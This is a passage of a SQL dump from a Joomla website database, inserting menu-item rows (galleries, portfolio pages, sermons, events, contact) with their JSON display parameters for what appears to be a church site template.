'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 20, 21, 0, '*', 0),
(208, 'mainmenu', 'Iframe Wrapper', 'iframe-wrapper', '', 'joomla/iframe-wrapper', 'index.php?option=com_wrapper&view=wrapper', 'component', -2, 107, 2, 2, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"url\":\"http:\\/\\/www.wikipedia.org\",\"scrolling\":\"auto\",\"width\":\"100%\",\"height\":\"500\",\"height_auto\":\"1\",\"add_scheme\":\"1\",\"frameborder\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 196, 197, 0, '*', 0),
(213, 'mainmenu', 'Widgetkit', 'widgetkit', '', 'resources/widgetkit', 'index.php?option=com_content&view=article&id=13', 'component', 0, 102, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"1\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"1\",\"link_author\":\"\",\"show_create_date\":\"1\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"1\",\"show_print_icon\":\"1\",\"show_email_icon\":\"1\",\"show_hits\":\"1\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":\"0\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 106, 107, 0, '*', 0),
(218, 'mainmenu', '2 Column Gallery', '2-column', '', 'portfolio/2-column', 'index.php?option=com_content&view=article&id=37', 'component', -2, 158, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 160, 161, 0, '*', 0),
(219, 'mainmenu', '3 Column Gallery', '3-column', '', 'portfolio/3-column', 'index.php?option=com_content&view=article&id=38', 'component', -2, 158, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 162, 163, 0, '*', 0),
(220, 'mainmenu', '4 Column Gallery', '4-column', '', 'portfolio/4-column', 'index.php?option=com_content&view=article&id=39', 'component', -2, 158, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 164, 165, 0, '*', 0);
INSERT INTO `y57u5_menu` (`id`, `menutype`, `title`, `alias`, `note`, `path`, `link`, `type`, `published`, `parent_id`, `level`, `component_id`, `checked_out`, `checked_out_time`, `browserNav`, `access`, `img`, `template_style_id`, `params`, `lft`, `rgt`, `home`, `language`, `client_id`) VALUES
(221, 'mainmenu', 'Gallery in Blocks', 'gallery-in-blocks', '', 'portfolio/gallery-in-blocks', 'index.php?option=com_content&view=article&id=40', 'component', -2, 158, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 168, 169, 0, '*', 0),
(224, 'mainmenu', 'Gallery by category', 'gallery-by-category', '', 'portfolio/gallery-by-category', 'index.php?option=com_content&view=article&id=42', 'component', -2, 158, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 170, 171, 0, '*', 0),
(225, 'mainmenu', '5 Column Gallery', '5-column', '', 'portfolio/5-column', 'index.php?option=com_content&view=article&id=43', 'component', -2, 158, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 166, 167, 0, '*', 0),
(227, 'mainmenu', 'Video Portfolio', 'video-portfolio', '', 'portfolio/video-portfolio', 'index.php?option=com_content&view=article&id=45', 'component', -2, 158, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 174, 175, 0, '*', 0),
(229, 'mainmenu', 'Audio Portfolio', 'audio-portfolio', '', 'portfolio/audio-portfolio', 'index.php?option=com_content&view=article&id=46', 'component', -2, 158, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 172, 173, 0, '*', 0),
(235, 'mainmenu', 'Home - Portfolio Layout', 'portfolio-layout', '', 'home/portfolio-layout', 'index.php?option=com_content&view=article&id=82', 'component', 0, 101, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_tags\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"Portfolio grid\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 4, 5, 0, '*', 0),
(248, 'mainmenu', 'Home - Church Layout', 'church-layout', '', 'home/church-layout', 'index.php?Itemid=', 'alias', 0, 101, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"101\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 2, 3, 0, '*', 0),
(253, 'mainmenu', 'Ministries', 'ministries', '', 'ministries', '', 'separator', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"menu_image\":\"\",\"menu_text\":1}', 117, 132, 0, '*', 0),
(266, 'quickmenu', 'Living Jesus Ministerial Training Institute', 'ljmti', '', 'ljmti', 'http://ljmti.solaareogunministries.org', 'url', 1, 1, 1, 0, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 285, 286, 0, '*', 0),
(267, 'quickmenu', 'Recent Sermons', 'quick-recent-sermons', '', 'quick-recent-sermons', 'index.php?Itemid=', 'alias', -2, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"aliasoptions\":\"435\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1}', 293, 294, 0, '*', 0),
(268, 'quickmenu', 'Recent Events', 'quick-recent-events', '', 'quick-recent-events', 'index.php?option=com_jevents&view=month&layout=calendar', 'component', -2, 1, 1, 10224, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"com_calViewName\":\"geraint\",\"com_calUseIconic\":\"1\",\"iconstoshow\":[\"byyear\",\"bymonth\",\"byweek\",\"byday\",\"search\"],\"showyearpast\":\"1\",\"overridelayout\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 295, 296, 0, '*', 0),
(269, 'quickmenu', 'Contact Us', 'bottom-contact-us', '', 'bottom-contact-us', 'index.php?option=com_contact&view=contact&id=1', 'component', -2, 1, 1, 8, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"presentation_style\":\"\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 299, 300, 0, '*', 0),
(303, 'mainmenu', 'Pricing Tables', 'pricing-tables', '', 'resources/pricing-tables', 'index.php?option=com_content&view=article&id=61', 'component', 0, 102, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 100, 101, 0, '*', 0),
(324, 'mainmenu', 'Search Results', '2012-06-29-19-28-58', '', '2012-06-29-19-28-58', '#', 'url', 0, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 355, 356, 0, '*', 0),
(406, 'mainmenu', 'Filterable Gallery', 'filterable-gallery', '', 'portfolio/filterable-gallery', 'index.php?option=com_content&view=article&id=82', 'component', -2, 158, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 176, 177, 0, '*', 0),
(410, 'mainmenu', 'Home - Minimal Design', 'minimal-design', '', 'home/minimal-design', 'index.php?option=com_content&view=article&id=82', 'component', 0, 101, 2, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_tags\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"Minimal design\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 6, 7, 0, '*', 0),
(420, 'portfolio-menu', 'Do not dwell in the past', 'do-not-dwell-in-the-past', '', 'do-not-dwell-in-the-past', 'index.php?option=com_content&view=article&id=69', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 301, 302, 0, '*', 0),
(421, 'portfolio-menu', 'penatibus dis parturient', 'penatibus-dis-parturient', '', 'penatibus-dis-parturient', 'index.php?option=com_content&view=article&id=70', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 307, 308, 0, '*', 0),
(422, 'portfolio-menu', 'Adipisicing elite', 'adipisicing-elite', '', 'adipisicing-elite', 'index.php?option=com_content&view=article&id=71', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 309, 310, 0, '*', 0),
(423, 'portfolio-menu', 'Cum sociis natoque', 'cum-sociis-natoque', '', 'cum-sociis-natoque', 'index.php?option=com_content&view=article&id=72', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 311, 312, 0, '*', 0),
(424, 'portfolio-menu', 'natoque penatibus', 'natoque-penatibus', '', 'natoque-penatibus', 'index.php?option=com_content&view=article&id=73', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 313, 314, 0, '*', 0),
(425, 'portfolio-menu', 'et magnis dis', 'et-magnis-dis', '', 'et-magnis-dis', 'index.php?option=com_content&view=article&id=74', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 315, 316, 0, '*', 0),
(426, 'portfolio-menu', 'sed diam voluptua', 'sed-diam-voluptua', '', 'sed-diam-voluptua', 'index.php?option=com_content&view=article&id=78', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 317, 318, 0, '*', 0),
(427, 'portfolio-menu', 'sectetur adipiscing elit', 'sectetur-adipiscing-elit', '', 'sectetur-adipiscing-elit', 'index.php?option=com_content&view=article&id=79', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, '', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}', 319, 320, 0, '*', 0),
